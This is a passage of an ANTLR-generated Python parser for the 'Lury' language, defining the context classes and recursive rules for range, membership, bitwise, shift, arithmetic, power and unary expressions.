self.state = 140
self.in_expression(0)
pass
elif la_ == 2:
localctx = LuryParser.RangeCloseContext(self, LuryParser.Range_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_range_expression)
self.state = 141
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 142
self.match(LuryParser.T__24)
self.state = 143
self.in_expression(0)
pass
self.state = 148
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,10,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class In_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_in_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class OrExpContext(In_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.In_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def or_expression(self):
return self.getTypedRuleContext(LuryParser.Or_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOrExp" ):
listener.enterOrExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOrExp" ):
listener.exitOrExp(self)
class InContext(In_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.In_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def in_expression(self):
return self.getTypedRuleContext(LuryParser.In_expressionContext,0)
def or_expression(self):
return self.getTypedRuleContext(LuryParser.Or_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIn" ):
listener.enterIn(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIn" ):
listener.exitIn(self)
class NotInContext(In_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.In_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def in_expression(self):
return self.getTypedRuleContext(LuryParser.In_expressionContext,0)
def or_expression(self):
return self.getTypedRuleContext(LuryParser.Or_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNotIn" ):
listener.enterNotIn(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNotIn" ):
listener.exitNotIn(self)
def in_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.In_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 22
self.enterRecursionRule(localctx, 22, self.RULE_in_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.OrExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 150
self.or_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 160
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,12,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 158
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,11,self._ctx)
if la_ == 1:
localctx = LuryParser.InContext(self, LuryParser.In_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_in_expression)
self.state = 152
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 153
self.match(LuryParser.T__25)
self.state = 154
self.or_expression(0)
pass
elif la_ == 2:
localctx = LuryParser.NotInContext(self, LuryParser.In_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_in_expression)
self.state = 155
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 156
self.match(LuryParser.T__26)
self.state = 157
self.or_expression(0)
pass
self.state = 162
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,12,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Or_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_or_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class OrContext(Or_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Or_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def or_expression(self):
return self.getTypedRuleContext(LuryParser.Or_expressionContext,0)
def xor_expression(self):
return self.getTypedRuleContext(LuryParser.Xor_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOr" ):
listener.enterOr(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOr" ):
listener.exitOr(self)
class XorExpContext(Or_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Or_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def xor_expression(self):
return self.getTypedRuleContext(LuryParser.Xor_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterXorExp" ):
listener.enterXorExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitXorExp" ):
listener.exitXorExp(self)
def or_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Or_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 24
self.enterRecursionRule(localctx, 24, self.RULE_or_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.XorExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 164
self.xor_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 171
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,13,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = LuryParser.OrContext(self, LuryParser.Or_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_or_expression)
self.state = 166
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 167
self.match(LuryParser.T__27)
self.state = 168
self.xor_expression(0)
self.state = 173
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,13,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Xor_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_xor_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class AndExpContext(Xor_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Xor_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def and_expression(self):
return self.getTypedRuleContext(LuryParser.And_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAndExp" ):
listener.enterAndExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAndExp" ):
listener.exitAndExp(self)
class XorContext(Xor_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Xor_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def xor_expression(self):
return self.getTypedRuleContext(LuryParser.Xor_expressionContext,0)
def and_expression(self):
return self.getTypedRuleContext(LuryParser.And_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterXor" ):
listener.enterXor(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitXor" ):
listener.exitXor(self)
def xor_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Xor_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 26
self.enterRecursionRule(localctx, 26, self.RULE_xor_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.AndExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 175
self.and_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 182
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,14,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = LuryParser.XorContext(self, LuryParser.Xor_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_xor_expression)
self.state = 177
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 178
self.match(LuryParser.T__28)
self.state = 179
self.and_expression(0)
self.state = 184
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,14,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class And_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_and_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class ShiftExpContext(And_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.And_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def shift_expression(self):
return self.getTypedRuleContext(LuryParser.Shift_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterShiftExp" ):
listener.enterShiftExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitShiftExp" ):
listener.exitShiftExp(self)
class AndContext(And_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.And_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def and_expression(self):
return self.getTypedRuleContext(LuryParser.And_expressionContext,0)
def shift_expression(self):
return self.getTypedRuleContext(LuryParser.Shift_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAnd" ):
listener.enterAnd(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAnd" ):
listener.exitAnd(self)
def and_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.And_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 28
self.enterRecursionRule(localctx, 28, self.RULE_and_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.ShiftExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 186
self.shift_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 193
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = LuryParser.AndContext(self, LuryParser.And_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_and_expression)
self.state = 188
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 189
self.match(LuryParser.T__29)
self.state = 190
self.shift_expression(0)
self.state = 195
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Shift_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_shift_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class LShiftContext(Shift_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Shift_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def shift_expression(self):
return self.getTypedRuleContext(LuryParser.Shift_expressionContext,0)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLShift" ):
listener.enterLShift(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLShift" ):
listener.exitLShift(self)
class AddExpContext(Shift_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Shift_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAddExp" ):
listener.enterAddExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAddExp" ):
listener.exitAddExp(self)
class RShiftContext(Shift_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Shift_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def shift_expression(self):
return self.getTypedRuleContext(LuryParser.Shift_expressionContext,0)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRShift" ):
listener.enterRShift(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRShift" ):
listener.exitRShift(self)
def shift_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Shift_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 30
self.enterRecursionRule(localctx, 30, self.RULE_shift_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.AddExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 197
self.addition_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 207
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 205
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,16,self._ctx)
if la_ == 1:
localctx = LuryParser.LShiftContext(self, LuryParser.Shift_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_shift_expression)
self.state = 199
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 200
self.match(LuryParser.T__30)
self.state = 201
self.addition_expression(0)
pass
elif la_ == 2:
localctx = LuryParser.RShiftContext(self, LuryParser.Shift_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_shift_expression)
self.state = 202
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 203
self.match(LuryParser.T__31)
self.state = 204
self.addition_expression(0)
pass
self.state = 209
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Addition_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_addition_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class AddContext(Addition_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Addition_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAdd" ):
listener.enterAdd(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAdd" ):
listener.exitAdd(self)
class MulExpContext(Addition_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Addition_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterMulExp" ):
listener.enterMulExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitMulExp" ):
listener.exitMulExp(self)
class SubContext(Addition_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Addition_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSub" ):
listener.enterSub(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSub" ):
listener.exitSub(self)
class ConContext(Addition_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Addition_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCon" ):
listener.enterCon(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCon" ):
listener.exitCon(self)
def addition_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Addition_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 32
self.enterRecursionRule(localctx, 32, self.RULE_addition_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.MulExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 211
self.multiplication_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 224
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,19,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 222
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,18,self._ctx)
if la_ == 1:
localctx = LuryParser.AddContext(self, LuryParser.Addition_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_addition_expression)
self.state = 213
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 214
self.match(LuryParser.T__32)
self.state = 215
self.multiplication_expression(0)
pass
elif la_ == 2:
localctx = LuryParser.SubContext(self, LuryParser.Addition_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_addition_expression)
self.state = 216
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 217
self.match(LuryParser.T__33)
self.state = 218
self.multiplication_expression(0)
pass
elif la_ == 3:
localctx = LuryParser.ConContext(self, LuryParser.Addition_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_addition_expression)
self.state = 219
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 220
self.match(LuryParser.T__34)
self.state = 221
self.multiplication_expression(0)
pass
self.state = 226
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,19,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Multiplication_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_multiplication_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class DivContext(Multiplication_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Multiplication_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDiv" ):
listener.enterDiv(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDiv" ):
listener.exitDiv(self)
class ModContext(Multiplication_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Multiplication_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterMod" ):
listener.enterMod(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitMod" ):
listener.exitMod(self)
class MulContext(Multiplication_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Multiplication_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterMul" ):
listener.enterMul(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitMul" ):
listener.exitMul(self)
class IDivContext(Multiplication_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Multiplication_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIDiv" ):
listener.enterIDiv(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIDiv" ):
listener.exitIDiv(self)
class PowerExpContext(Multiplication_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Multiplication_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPowerExp" ):
listener.enterPowerExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPowerExp" ):
listener.exitPowerExp(self)
def multiplication_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Multiplication_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 34
self.enterRecursionRule(localctx, 34, self.RULE_multiplication_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.PowerExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 228
self.power_expression()
self._ctx.stop = self._input.LT(-1)
self.state = 244
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,21,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 242
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,20,self._ctx)
if la_ == 1:
localctx = LuryParser.MulContext(self, LuryParser.Multiplication_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_multiplication_expression)
self.state = 230
if not self.precpred(self._ctx, 5):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 5)")
self.state = 231
self.match(LuryParser.T__35)
self.state = 232
self.power_expression()
pass
elif la_ == 2:
localctx = LuryParser.DivContext(self, LuryParser.Multiplication_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_multiplication_expression)
self.state = 233
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 234
self.match(LuryParser.T__36)
self.state = 235
self.power_expression()
pass
elif la_ == 3:
localctx = LuryParser.IDivContext(self, LuryParser.Multiplication_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_multiplication_expression)
self.state = 236
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 237
self.match(LuryParser.T__37)
self.state = 238
self.power_expression()
pass
elif la_ == 4:
localctx = LuryParser.ModContext(self, LuryParser.Multiplication_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_multiplication_expression)
self.state = 239
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 240
self.match(LuryParser.T__38)
self.state = 241
self.power_expression()
pass
self.state = 246
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,21,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Power_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_power_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class PowerContext(Power_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Power_expressionContext
super().__init__(parser)
self.left = None # Unary_expressionContext
self.op = None # Token
self.copyFrom(ctx)
def unary_expression(self):
return self.getTypedRuleContext(LuryParser.Unary_expressionContext,0)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPower" ):
listener.enterPower(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPower" ):
listener.exitPower(self)
def power_expression(self):
localctx = LuryParser.Power_expressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 36, self.RULE_power_expression)
try:
localctx = LuryParser.PowerContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 247
localctx.left = self.unary_expression()
self.state = 250
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,22,self._ctx)
if la_ == 1:
self.state = 248
localctx.op = self.match(LuryParser.T__39)
self.state = 249
self.power_expression()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Unary_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_unary_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class UnaryContext(Unary_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Unary_expressionContext
super().__init__(parser)
self.unary = None # Unary_expressionContext
self.copyFrom(ctx)
def unary_expression(self):
return self.getTypedRuleContext(LuryParser.Unary_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterUnary" ):
listener.enterUnary(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitUnary" ):
listener.exitUnary(self)
class PostfixExpContext(Unary_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Unary_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def postfix_expression(self):
return self.getTypedRuleContext(LuryParser.Postfix_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPostfixExp" ):
listener.enterPostfixExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPostfixExp" ):
listener.exitPostfixExp(self)
def unary_expression(self):
localctx = LuryParser.Unary_expressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 38, self.RULE_unary_expression)
self._la = 0 # Token type
try:
self.state = 255
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [LuryParser.T__32, LuryParser.T__33, LuryParser.T__34, LuryParser.T__40, LuryParser.T__41]:
localctx = LuryParser.UnaryContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 252
_la = self._input.LA(1)
